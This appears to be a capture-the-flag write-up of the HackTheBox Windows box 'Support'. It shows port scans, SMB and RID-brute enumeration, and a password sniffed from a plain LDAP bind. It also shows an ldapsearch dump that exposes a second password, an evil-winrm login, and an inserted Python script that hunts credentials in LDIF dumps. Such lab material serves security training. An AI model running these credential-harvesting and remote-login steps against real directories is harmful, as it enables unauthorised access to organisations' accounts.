#hackthebox #windows #easy

# Information Gathering

As always, I opened the box by scanning all TCP ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 16:12 UTC
Nmap scan report for 10.10.11.174
Host is up (0.048s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49702/tcp open  unknown
49740/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 43.87 seconds
```

The note about `--defeat-rst-ratelimit` is a side effect of the high `--min-rate`: some ports reported as filtered may really be closed. That only matters if an expected port is missing, which is not the case here.

Then I ran a version and script scan against the discovered ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49676,49702,49740
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 16:22 UTC
Nmap scan report for 10.10.11.174
Host is up (0.047s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-24 16:23:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49740/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=8/24%Time=68AB3C72%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-08-24T16:23:49
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.47 seconds
```

Lastly, a UDP scan of the top 10 ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 16:22 UTC
Nmap scan report for 10.10.11.174
Host is up (0.050s latency).

PORT     STATE         SERVICE
53/udp   open          domain
67/udp   open|filtered dhcps
123/udp  open          ntp
135/udp  open|filtered msrpc
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  open|filtered snmp
445/udp  open|filtered microsoft-ds
631/udp  open|filtered ipp
1434/udp open|filtered ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 1.73 seconds
```

Taken together, this is a domain controller (hostname `DC`) for `support.htb`: DNS, Kerberos, LDAP and LDAPS, the global catalog, kpasswd and ADWS are all present. SMB signing is required, so relaying NTLM to SMB on this host is not an option, and WinRM on 5985 is a way in once credentials turn up.

---

# Enumeration

Before anything else, I mapped the target IP address to the domain name in `/etc/hosts`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo '10.10.11.174 support.htb' | sudo tee -a /etc/hosts
[sudo] password for kali: 
10.10.11.174 support.htb
```

##### SMB - TCP 139 445

For Windows boxes, I like to start my enumeration with `SMB` when it is available. `smbclient` with a null session (`-N`) lists 6 shares, including `support-tools`, which is not a default share.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N -L //$IP

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	support-tools   Disk      support staff tools
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

As the name suggests, the share contains support tools such as `7-Zip`, `Notepad++`, `PuTTY` and more. One file, however, is not a publicly available tool: `UserInfo.exe.zip`. It is also the only file with a July timestamp; everything else was dropped on the share in May.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N //$IP/support-tools
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 17:01:06 2022
  ..                                  D        0  Sat May 28 11:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 11:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 11:19:55 2022
  putty.exe                           A  1273576  Sat May 28 11:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 11:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 17:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 11:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe   A 44398000  Sat May 28 11:19:43 2022

		4026367 blocks of size 4096. 970452 blocks available
```

I downloaded the file and listed its contents with `unzip -l` before extracting anything.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ unzip -l UserInfo.exe.zip
Archive:  UserInfo.exe.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    12288  2022-05-27 17:51   UserInfo.exe
    99840  2022-03-01 18:18   CommandLineParser.dll
    22144  2021-10-22 23:42   Microsoft.Bcl.AsyncInterfaces.dll
    47216  2021-10-22 23:48   Microsoft.Extensions.DependencyInjection.Abstractions.dll
    84608  2021-10-22 23:48   Microsoft.Extensions.DependencyInjection.dll
    64112  2021-10-22 23:51   Microsoft.Extensions.Logging.Abstractions.dll
    20856  2020-02-19 10:05   System.Buffers.dll
   141184  2020-02-19 10:05   System.Memory.dll
   115856  2018-05-15 13:29   System.Numerics.Vectors.dll
    18024  2021-10-22 23:40   System.Runtime.CompilerServices.Unsafe.dll
    25984  2020-02-19 10:05   System.Threading.Tasks.Extensions.dll
      563  2022-05-27 16:59   UserInfo.exe.config
---------                     -------
   652675                     12 files
```

The bundled `CommandLineParser.dll` and `Microsoft.Extensions.*` assemblies mark this as a .NET application, and the 12 KB `UserInfo.exe` is where the custom logic lives. First, I extracted just `UserInfo.exe` and `UserInfo.exe.config`, the two files I was most interested in.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ unzip UserInfo.exe.zip UserInfo.exe UserInfo.exe.config
Archive:  UserInfo.exe.zip
  inflating: UserInfo.exe
  inflating: UserInfo.exe.config
```

`UserInfo.exe.config`

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat UserInfo.exe.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <startup>
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
    </startup>
    <runtime>
        <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
            <dependentAssembly>
                <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
                <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
            </dependentAssembly>
        </assemblyBinding>
    </runtime>
</configuration>
```

The config confirms a .NET Framework 4.8 target. That matters for what comes next: a managed assembly can be run (or decompiled) on Linux without a Windows VM.

Before having any credentials, I was able to enumerate users with `nxc` and its `--rid-brute` option.

![[Pasted image 20250824114936.png]]

I turned the output into a `users.txt` wordlist.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat users | cut -d '\' -f 2 | cut -d ' ' -f 1 > users.txt

┌──(kali㉿kali)-[~/Desktop]
└─$ cat users.txt
Administrator
Guest
krbtgt
DC$
ldap
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria
MANAGEMENT$
```

Besides `DC$` there is a second machine account, `MANAGEMENT$`, which is worth keeping in mind.

`UserInfo.exe` appears to contain information about `LDAP`, but it's hard to inspect an `.exe` file on Linux.

![[Pasted image 20250824122432.png]]

I installed `mono`, which runs .NET Framework assemblies on Linux.

```bash
┌──(kali㉿kali)-[~/Desktop/UserInfo]
└─$ mono --version
Mono JIT compiler version 6.12.0.199 (tarball Thu Apr  3 15:13:01 UTC 2025)
Copyright (C) 2002-2014 Novell, Inc, Xamarin Inc and Contributors. www.mono-project.com
	TLS:           __thread
	SIGSEGV:       altstack
	Notifications: epoll
	Architecture:  amd64
	Disabled:      none
	Misc:          softdebug 
	Interpreter:   yes
	LLVM:          supported, not enabled.
	Suspend:       hybrid
	GC:            sgen (concurrent by default)
```

```bash
┌──(kali㉿kali)-[~/Desktop/UserInfo]
└─$ mono UserInfo.exe find
[-] At least one of -first or -last is required.

┌──(kali㉿kali)-[~/Desktop/UserInfo]
└─$ mono UserInfo.exe find -first wook
[-] Exception: No Such Object

┌──(kali㉿kali)-[~/Desktop/UserInfo]
└─$ mono UserInfo.exe find -first wook -v
[*] LDAP query to use: (givenName=wook)
[-] Exception: No Such Object
```

The `No Such Object` error is an LDAP response, so the tool is talking to the DC. With `Wireshark` capturing while the tool ran, the LDAP bind request shows up with its authentication in the clear: the user is `support\ldap` and the password appears to be `nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz`.

![[Pasted image 20250824142421.png]]

Two things went wrong on the defensive side here: a domain credential is embedded in a tool handed out on a readable share, and the tool binds over plain LDAP on 389/tcp rather than LDAPS on 636, so anyone able to run or sniff it gets the password.

I tested this set of credentials with `nxc`.

![[Pasted image 20250824142729.png]]

##### GetNPUsers.py - Impacket

I checked whether `AS-REP roasting` is possible with `GetNPUsers.py` from `Impacket`, but none of the accounts has `UF_DONT_REQUIRE_PREAUTH` set. The `KDC_ERR_CLIENT_REVOKED` line corresponds to the third entry in `users.txt`, `krbtgt`, which is disabled by default.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-GetNPUsers support.htb/ -dc-ip $IP -usersfile users.txt -format hashcat -outputfile output.txt -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ldap doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User support doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smith.rosario doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hernandez.stanley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wilson.shelby doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User anderson.damian doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User thomas.raphael doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User levine.leopoldo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User raven.clifton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bardot.mary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User cromwell.gerard doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User monroe.david doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User west.laura doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User langley.lucy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User daughtler.mabel doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stoll.rachelle doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ford.victoria doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User MANAGEMENT$ doesn't have UF_DONT_REQUIRE_PREAUTH set
```

Back to `LDAP`. With the `ldap` account's credentials I dumped the directory with `ldapsearch`:

`ldapsearch -H ldap://$IP -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support,DC=htb'`

This produced a lot of output, so I saved it to a file, `ldap.out`. Under the `support` user object (`support, Users, support.htb`), the `info` attribute holds plain text that looks like a password: `support:Ironside47pleasure40Watchful`.

![[Pasted image 20250824145311.png]]

`nxc` confirms the credential pair is valid. As a control, appending a `z` to the password returns `LOGON_FAILURE`, so the success is not a false positive.

![[Pasted image 20250824145632.png]]

Port 5985 is open on the target, so let's see if we can `WinRM` into the machine as the `support` user.

![[Pasted image 20250824145915.png]]

Successfully logged in via `evil-winrm` as `support`.
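Stepping back to the `ldapsearch` step: the `info` attribute above was found by scrolling through `ldap.out`. The script below is an added example, not part of the original writeup and not a feature of `ldapsearch` or `nxc`, that does the same hunt automatically. It parses an ldapsearch LDIF dump (handling the 76-column line folding and base64 `::` values that ldapsearch emits) and flags `info`, `description`, `comment` and `notes` values that either look like a password or mention one. The sample LDIF inside it is constructed in the shape of ldapsearch output: the `support` entry mirrors this box, while the `ldap` description text and the `svc_backup` account are invented to exercise the folding and base64 paths.

```python
"""Hunt for passwords left in free-text AD attributes of an ldapsearch dump.

Added example for this writeup; it is not part of the original post and not
a feature of ldapsearch or nxc. It reads LDIF the way ldapsearch writes it
(folded lines continued by a leading space, base64 values after "::") and
reports entries whose free-text attributes look like they carry a credential.
"""
import base64
import re
from typing import Dict, List, Tuple

# Free-text attributes where admins tend to leave passwords.
FREE_TEXT_ATTRS = ("info", "description", "comment", "notes")
# Words that make a value worth reading even when no token looks like a password.
KEYWORD_RE = re.compile(r"pass(word|wd)?|pwd|cred|secret", re.IGNORECASE)
# Symbols that make a token password-like when mixed with letters.
SPECIALS = set("!@#$%^&*_+=~")
TRIM = ".,;:()[]{}\"'"

Entry = Dict[str, List[str]]
Hit = Tuple[str, str, str, str]  # (sAMAccountName, attribute, reason, value)


def parse_ldif(text: str) -> List[Entry]:
    """Parse LDIF into entries; attribute names are lowercased.

    Only records with a dn are kept, so ldapsearch's trailing
    'search: 2 / result: 0 Success' block is dropped automatically.
    """
    # Unfold: a line starting with a single space continues the previous one.
    lines: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)

    entries: List[Entry] = []
    current: Entry = {}
    for line in lines + [""]:  # sentinel blank line flushes the last entry
        if not line.strip():
            if "dn" in current:
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):  # "attr:: <base64>" form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(name.strip().lower(), []).append(value)
    return entries


def looks_like_secret(token: str) -> bool:
    """Heuristic: 8+ chars mixing letters with digits or symbols."""
    token = token.strip(TRIM)
    if len(token) < 8:
        return False
    has_alpha = any(c.isalpha() for c in token)
    has_digit = any(c.isdigit() for c in token)
    has_special = any(c in SPECIALS for c in token)
    return has_alpha and (has_digit or has_special)


def find_candidate_creds(entries: List[Entry]) -> List[Hit]:
    """Return (sam, attr, reason, value) for every suspicious free-text value."""
    hits: List[Hit] = []
    for entry in entries:
        sam = entry.get("samaccountname", [""])[0]
        if not sam:
            continue
        for attr in FREE_TEXT_ATTRS:
            for value in entry.get(attr, []):
                for token in value.split():
                    if looks_like_secret(token):
                        hits.append((sam, attr, "token", token.strip(TRIM)))
                if KEYWORD_RE.search(value):
                    hits.append((sam, attr, "keyword", value))
    return hits


def cred_pairs(hits: List[Hit]) -> List[str]:
    """user:password lines for the token hits, ready for an nxc check."""
    return [f"{sam}:{val}" for sam, _, reason, val in hits if reason == "token"]


# Constructed sample in the shape of ldapsearch output. The "support" entry
# mirrors this writeup; the "ldap" description text and the "svc_backup"
# account are invented to exercise the folding and base64 paths.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=support,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# Administrator, Users, support.htb
dn: CN=Administrator,CN=Users,DC=support,DC=htb
objectClass: user
cn: Administrator
description: Built-in account for administering the computer/domain
sAMAccountName: Administrator

# ldap, Users, support.htb
dn: CN=ldap,CN=Users,DC=support,DC=htb
objectClass: user
cn: ldap
description: Service account used by UserInfo.exe for lookups; do not rotate
  the password without updating the tool
sAMAccountName: ldap

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: user
cn: support
info: Ironside47pleasure40Watchful
sAMAccountName: support

# svc_backup, Users, support.htb
dn: CN=svc_backup,CN=Users,DC=support,DC=htb
objectClass: user
cn: svc_backup
description:: VGVtcCBwYXNzd29yZCBpcyBTdW1tZXIyMDIyIQ==
sAMAccountName: svc_backup

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 4
"""


def main() -> None:
    entries = parse_ldif(SAMPLE_LDIF)
    hits = find_candidate_creds(entries)
    for sam, attr, reason, value in hits:
        print(f"[{reason}] {sam} {attr}: {value}")
    print("pairs to verify:", cred_pairs(hits))


if __name__ == "__main__":
    main()
```

Against real output, call `parse_ldif(open("ldap.out").read())` instead of the sample. The `[token]` hits are `user:password` pairs that can go straight into an `nxc` check, as the author did by hand; the `[keyword]` hits (a description that merely talks about a password) are worth reading, since the secret may sit in a neighbouring attribute or in a form the heuristic does not catch.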
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i $IP -u support -p 'Ironside47pleasure40Watchful'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support
```

Found `user.txt`:

```powershell
*Evil-WinRM* PS C:\Users\support> cd Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> ls

    Directory: C:\Users\support\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          8/24/2025   9:08 AM             34 user.txt

*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
bb5...
```

# Privilege Escalation (INCOMPLETE)

I got stuck on the PrivEsc part and ended up referring to `0xdf`'s writeup. If I remember correctly, 0xdf is also the creator of this machine. Honestly, I think this machine is way beyond my current skill level (how is this an easy-rated machine?) and, to be fair, I don't think such a complex privilege escalation would appear on the OSCP exam. So I'm leaving this writeup incomplete at this point, and I'll come back to it later if I get the chance.